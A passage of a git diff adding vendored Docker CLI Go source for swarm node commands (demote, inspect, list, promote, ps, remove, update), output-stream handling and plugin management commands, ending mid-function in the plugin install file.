b/vendor/github.com/docker/docker/cli/command/node/demote.go new file mode 100644 index 0000000000..33f86c6499 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/demote.go @@ -0,0 +1,36 @@ +package node + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "demote NODE [NODE...]", + Short: "Demote one or more nodes from manager in the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runDemote(dockerCli, args) + }, + } +} + +func runDemote(dockerCli *command.DockerCli, nodes []string) error { + demote := func(node *swarm.Node) error { + if node.Spec.Role == swarm.NodeRoleWorker { + fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID) + return errNoRoleChange + } + node.Spec.Role = swarm.NodeRoleWorker + return nil + } + success := func(nodeID string) { + fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID) + } + return updateNodes(dockerCli, nodes, demote, success) +} diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go new file mode 100644 index 0000000000..fde70185f8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/inspect.go @@ -0,0 +1,144 @@ +package node + +import ( + "fmt" + "io" + "sort" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/go-units" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + nodeIds []string + format string + pretty bool +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] self|NODE [NODE...]", + Short: "Display detailed information on one or more nodes", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.nodeIds = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + getRef := func(ref string) (interface{}, []byte, error) { + nodeRef, err := Reference(ctx, client, ref) + if err != nil { + return nil, nil, err + } + node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) + return node, nil, err + } + + if !opts.pretty { + return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef) + } + return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef) +} + +func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error { + for idx, ref := range refs { + obj, _, err := getRef(ref) + if err != nil { + return err + } + printNode(out, obj.(swarm.Node)) + + // TODO: better way to do this? + // print extra space between objects, but not after the last one + if idx+1 != len(refs) { + fmt.Fprintf(out, "\n\n") + } else { + fmt.Fprintf(out, "\n") + } + } + return nil +} + +// TODO: use a template +func printNode(out io.Writer, node swarm.Node) { + fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID) + ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name) + if node.Spec.Labels != nil { + fmt.Fprintln(out, "Labels:") + for k, v := range node.Spec.Labels { + fmt.Fprintf(out, " - %s = %s\n", k, v) + } + } + + ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname) + fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt)) + fmt.Fprintln(out, "Status:") + fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State)) + ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message)) + fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability)) + ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr)) + + if node.ManagerStatus != nil { + fmt.Fprintln(out, "Manager Status:") + fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr) + fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability)) + leader := "No" + if node.ManagerStatus.Leader { + leader = "Yes" + } + fmt.Fprintf(out, " Leader:\t\t%s\n", leader) + } + + fmt.Fprintln(out, "Platform:") + fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS) + fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture) + + fmt.Fprintln(out, "Resources:") + fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9) + fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes))) + + var pluginTypes []string + pluginNamesByType := map[string][]string{} + for _, p := range node.Description.Engine.Plugins { + // append to pluginTypes only if not done previously + if _, ok := pluginNamesByType[p.Type]; !ok { + pluginTypes = append(pluginTypes, p.Type) + } + pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name) + } + + if len(pluginTypes) > 0 { + fmt.Fprintln(out, "Plugins:") + sort.Strings(pluginTypes) // ensure stable output + for _, pluginType := range pluginTypes { + fmt.Fprintf(out, " %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", ")) + } + } + fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion) + + if len(node.Description.Engine.Labels) != 0 { + fmt.Fprintln(out, "Engine Labels:") + for k, v := range node.Description.Engine.Labels { + fmt.Fprintf(out, " - %s = %s\n", k, v) + } + } +} diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go new file mode 100644 index 0000000000..9cacdcf441 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/list.go @@ -0,0 +1,115 @@ +package node + +import ( + "fmt" + "io" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +const ( + listItemFmt = "%s\t%s\t%s\t%s\t%s\n" +) + +type listOptions struct { + quiet bool + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List nodes in the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + out := dockerCli.Out() + ctx := context.Background() + + nodes, err := client.NodeList( + ctx, + types.NodeListOptions{Filters: opts.filter.Value()}) + if err != nil { + return err + } + + if len(nodes) > 0 && !opts.quiet { + // only non-empty nodes and not quiet, should we call /info api + info, err := client.Info(ctx) + if err != nil { + return err + } + printTable(out, nodes, info) + } else if !opts.quiet { + // no nodes and not quiet, print only one line with columns ID, HOSTNAME, ... + printTable(out, nodes, types.Info{}) + } else { + printQuiet(out, nodes) + } + + return nil +} + +func printTable(out io.Writer, nodes []swarm.Node, info types.Info) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS") + for _, node := range nodes { + name := node.Description.Hostname + availability := string(node.Spec.Availability) + + reachability := "" + if node.ManagerStatus != nil { + if node.ManagerStatus.Leader { + reachability = "Leader" + } else { + reachability = string(node.ManagerStatus.Reachability) + } + } + + ID := node.ID + if node.ID == info.Swarm.NodeID { + ID = ID + " *" + } + + fmt.Fprintf( + writer, + listItemFmt, + ID, + name, + command.PrettyPrint(string(node.Status.State)), + command.PrettyPrint(availability), + command.PrettyPrint(reachability)) + } +} + +func printQuiet(out io.Writer, nodes []swarm.Node) { + for _, node := range nodes { + fmt.Fprintln(out, node.ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go new file mode 100644 index 0000000000..7e6c55d487 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/opts.go @@ -0,0 +1,60 @@ +package node + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" +) + +type nodeOptions struct { + annotations + role string + availability string +} + +type annotations struct { + name string + labels opts.ListOpts +} + +func newNodeOptions() *nodeOptions { + return &nodeOptions{ + annotations: annotations{ + labels: opts.NewListOpts(nil), + }, + } +} + +func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) { + var spec swarm.NodeSpec + + spec.Annotations.Name = opts.annotations.name + spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll()) + + switch swarm.NodeRole(strings.ToLower(opts.role)) { + case swarm.NodeRoleWorker: + spec.Role = swarm.NodeRoleWorker + case swarm.NodeRoleManager: + spec.Role = swarm.NodeRoleManager + case "": + default: + return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role) + } + + switch swarm.NodeAvailability(strings.ToLower(opts.availability)) { + case swarm.NodeAvailabilityActive: + spec.Availability = swarm.NodeAvailabilityActive + case swarm.NodeAvailabilityPause: + spec.Availability = swarm.NodeAvailabilityPause + case swarm.NodeAvailabilityDrain: + spec.Availability = swarm.NodeAvailabilityDrain + case "": + default: + return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability) + } + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go new file mode 100644 index 0000000000..f47d783f4c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/promote.go @@ -0,0 +1,36 @@ +package node + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "promote NODE [NODE...]", + Short: "Promote one or more nodes to manager in the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPromote(dockerCli, args) + }, + } +} + +func runPromote(dockerCli *command.DockerCli, nodes []string) error { + promote := func(node *swarm.Node) error { + if node.Spec.Role == swarm.NodeRoleManager { + fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID) + return errNoRoleChange + } + node.Spec.Role = swarm.NodeRoleManager + return nil + } + success := func(nodeID string) { + fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID) + } + return updateNodes(dockerCli, nodes, promote, success) +} diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go new file mode 100644 index 0000000000..a034721d24 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/ps.go @@ -0,0 +1,93 @@ +package node + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type psOptions struct { + nodeIDs []string + noResolve bool + noTrunc bool + filter opts.FilterOpt +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] [NODE...]", + Short: "List tasks running on one or more nodes, defaults to current node", + Args: cli.RequiresMinArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + opts.nodeIDs = []string{"self"} + + if len(args) != 0 { + opts.nodeIDs = args + } + + return runPs(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPs(dockerCli *command.DockerCli, opts psOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var ( + errs []string + tasks []swarm.Task + ) + + for _, nodeID := range opts.nodeIDs { + nodeRef, err := Reference(ctx, client, nodeID) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + filter := opts.filter.Value() + filter.Add("node", node.ID) + + nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + tasks = append(tasks, nodeTasks...) + } + + if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil { + errs = append(errs, err.Error()) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go new file mode 100644 index 0000000000..19b4a96631 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/remove.go @@ -0,0 +1,56 @@ +package node + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + force bool +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := removeOptions{} + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] NODE [NODE...]", + Aliases: []string{"remove"}, + Short: "Remove one or more nodes from the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm") + return cmd +} + +func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var errs []string + + for _, nodeID := range args { + err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force}) + if err != nil { + errs = append(errs, err.Error()) + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go new file mode 100644 index 0000000000..65339e138b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/update.go @@ -0,0 +1,121 @@ +package node + +import ( + "errors" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "github.com/spf13/pflag" + "golang.org/x/net/context" +) + +var ( + errNoRoleChange = errors.New("role was already set to the requested value") +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + nodeOpts := newNodeOptions() + + cmd := &cobra.Command{ + Use: "update [OPTIONS] NODE", + Short: "Update a node", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), args[0]) + }, + } + + flags := cmd.Flags() + flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)") + flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)") + flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)") + labelKeys := opts.NewListOpts(nil) + flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists") + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error { + success := func(_ string) { + fmt.Fprintln(dockerCli.Out(), nodeID) + } + return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success) +} + +func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error { + client := dockerCli.Client() + ctx := context.Background() + + for _, nodeID := range nodes { + node, _, err := client.NodeInspectWithRaw(ctx, nodeID) + if err != nil { + return err + } + + err = mergeNode(&node) + if err != nil { + if err == errNoRoleChange { + continue + } + return err + } + err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec) + if err != nil { + return err + } + success(nodeID) + } + return nil +} + +func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error { + return func(node *swarm.Node) error { + spec := &node.Spec + + if flags.Changed(flagRole) { + str, err := flags.GetString(flagRole) + if err != nil { + return err + } + spec.Role = swarm.NodeRole(str) + } + if flags.Changed(flagAvailability) { + str, err := flags.GetString(flagAvailability) + if err != nil { + return err + } + spec.Availability = swarm.NodeAvailability(str) + } + if spec.Annotations.Labels == nil { + spec.Annotations.Labels = make(map[string]string) + } + if flags.Changed(flagLabelAdd) { + labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() + for k, v := range runconfigopts.ConvertKVStringsToMap(labels) { + spec.Annotations.Labels[k] = v + } + } + if flags.Changed(flagLabelRemove) { + keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, k := range keys { + // if a key doesn't exist, fail the command explicitly + if _, exists := spec.Annotations.Labels[k]; !exists { + return fmt.Errorf("key %s doesn't exist in node's labels", k) + } + delete(spec.Annotations.Labels, k) + } + } + return nil + } +} + +const ( + flagRole = "role" + flagAvailability = "availability" + flagLabelAdd = "label-add" + flagLabelRemove = "label-rm" +) diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go new file mode 100644 index 0000000000..85718d7acd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/out.go @@ -0,0 +1,69 @@ +package command + +import ( + "io" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/term" +) + +// OutStream is an output stream used by the DockerCli to write normal program +// output. +type OutStream struct { + out io.Writer + fd uintptr + isTerminal bool + state *term.State +} + +func (o *OutStream) Write(p []byte) (int, error) { + return o.out.Write(p) +} + +// FD returns the file descriptor number for this stream +func (o *OutStream) FD() uintptr { + return o.fd +} + +// IsTerminal returns true if this stream is connected to a terminal +func (o *OutStream) IsTerminal() bool { + return o.isTerminal +} + +// SetRawTerminal sets raw mode on the output terminal +func (o *OutStream) SetRawTerminal() (err error) { + if os.Getenv("NORAW") != "" || !o.isTerminal { + return nil + } + o.state, err = term.SetRawTerminalOutput(o.fd) + return err +} + +// RestoreTerminal restores normal mode to the terminal +func (o *OutStream) RestoreTerminal() { + if o.state != nil { + term.RestoreTerminal(o.fd, o.state) + } +} + +// GetTtySize returns the height and width in characters of the tty +func (o *OutStream) GetTtySize() (uint, uint) { + if !o.isTerminal { + return 0, 0 + } + ws, err := term.GetWinsize(o.fd) + if err != nil { + logrus.Debugf("Error getting size: %s", err) + if ws == nil { + return 0, 0 + } + } + return uint(ws.Height), uint(ws.Width) +} + +// NewOutStream returns a new OutStream object from a Writer +func NewOutStream(out io.Writer) *OutStream { + fd, isTerminal := term.GetFdInfo(out) + return &OutStream{out: out, fd: fd, isTerminal: isTerminal} +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go new file mode 100644 index 0000000000..92c990a975 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go @@ -0,0 +1,31 @@ +package plugin + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewPluginCommand returns a cobra command for `plugin` subcommands +func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "plugin", + Short: "Manage plugins", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + + cmd.AddCommand( + newDisableCommand(dockerCli), + newEnableCommand(dockerCli), + newInspectCommand(dockerCli), + newInstallCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newSetCommand(dockerCli), + newPushCommand(dockerCli), + newCreateCommand(dockerCli), + newUpgradeCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go new file mode 100644 index 0000000000..2aab1e9e4a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/create.go @@ -0,0 +1,125 @@ +package plugin + +import ( + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/reference" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// validateTag checks if the given repoName can be resolved. +func validateTag(rawRepo string) error { + _, err := reference.ParseNamed(rawRepo) + + return err +} + +// validateConfig ensures that a valid config.json is available in the given path +func validateConfig(path string) error { + dt, err := os.Open(filepath.Join(path, "config.json")) + if err != nil { + return err + } + + m := types.PluginConfig{} + err = json.NewDecoder(dt).Decode(&m) + dt.Close() + + return err +} + +// validateContextDir validates the given dir and returns abs path on success. +func validateContextDir(contextDir string) (string, error) { + absContextDir, err := filepath.Abs(contextDir) + + stat, err := os.Lstat(absContextDir) + if err != nil { + return "", err + } + + if !stat.IsDir() { + return "", fmt.Errorf("context must be a directory") + } + + return absContextDir, nil +} + +type pluginCreateOptions struct { + repoName string + context string + compress bool +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + options := pluginCreateOptions{} + + cmd := &cobra.Command{ + Use: "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR", + Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + options.repoName = args[0] + options.context = args[1] + return runCreate(dockerCli, options) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error { + var ( + createCtx io.ReadCloser + err error + ) + + if err := validateTag(options.repoName); err != nil { + return err + } + + absContextDir, err := validateContextDir(options.context) + if err != nil { + return err + } + + if err := validateConfig(options.context); err != nil { + return err + } + + compression := archive.Uncompressed + if options.compress { + logrus.Debugf("compression enabled") + compression = archive.Gzip + } + + createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{ + Compression: compression, + }) + + if err != nil { + return err + } + + ctx := context.Background() + + createOptions := types.PluginCreateOptions{RepoName: options.repoName} + if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), options.repoName) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go new file mode 100644 index 0000000000..07b0ec2288 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/disable.go @@ -0,0 +1,36 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command { + var force bool + + cmd := &cobra.Command{ + Use: "disable [OPTIONS] PLUGIN", + Short: "Disable a plugin", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runDisable(dockerCli, args[0], force) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin") + return cmd +} + +func runDisable(dockerCli *command.DockerCli, name string, force bool) error { + if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), name) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go new file mode 100644 index 0000000000..77762f4024 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/enable.go @@ -0,0 +1,47 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type enableOpts struct { + timeout int + name string +} + +func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts enableOpts + + cmd := &cobra.Command{ + Use: "enable [OPTIONS] PLUGIN", + Short: "Enable a plugin", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.name = args[0] + return runEnable(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)") + return cmd +} + +func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error { + name := opts.name + if opts.timeout < 0 { + return fmt.Errorf("negative timeout %d is invalid", opts.timeout) + } + + if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), name) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go new file mode 100644 index 0000000000..c2c7a0d6bc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go @@ -0,0 +1,42 @@ +package plugin + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + pluginNames []string + format string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] PLUGIN [PLUGIN...]", + Short: "Display detailed information on one or more plugins", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.pluginNames = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + getRef := func(ref string) (interface{}, []byte, error) { + return client.PluginInspectWithRaw(ctx, ref) + } + + return inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef) +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go new file mode 100644 index 0000000000..2c3170c54a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/install.go @@ -0,0 +1,208 @@ +package plugin + +import ( + "bufio" + "errors" + "fmt" + "strings" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" + "github.com/spf13/pflag" + "golang.org/x/net/context" +) + +type pluginOptions struct { + remote string + localName string + grantPerms bool + disable bool + args []string + skipRemoteCheck bool +} + +func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) { + flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin") + command.AddTrustedFlags(flags, true) +} + +func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command { + var options pluginOptions + cmd := &cobra.Command{ + Use: "install [OPTIONS] PLUGIN [KEY=VALUE...]", + Short: "Install a plugin", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + options.remote = args[0] + if len(args) > 1 { + options.args = args[1:] + } + return runInstall(dockerCli, options) + }, + } + + flags := cmd.Flags() + loadPullFlags(&options, flags) + flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install") + flags.StringVar(&options.localName, "alias", "", "Local name for plugin") + return cmd +} + +func getRepoIndexFromUnnormalizedRef(ref distreference.Named) (*registrytypes.IndexInfo, error) { + named, err := reference.ParseNamed(ref.Name()) + if err != nil { + return nil, err + } + + repoInfo, err := registry.ParseRepositoryInfo(named) + if err != nil { + return nil, err + } + + return repoInfo.Index, nil +} + +type pluginRegistryService struct { + registry.Service +} + +func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { + repoInfo, err = s.Service.ResolveRepository(name) + if repoInfo != nil { + repoInfo.Class = "plugin" + } + return +} + +func newRegistryService() registry.Service { + return pluginRegistryService{ + Service: registry.NewService(registry.ServiceOptions{V2Only: true}), + } +} + +func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts 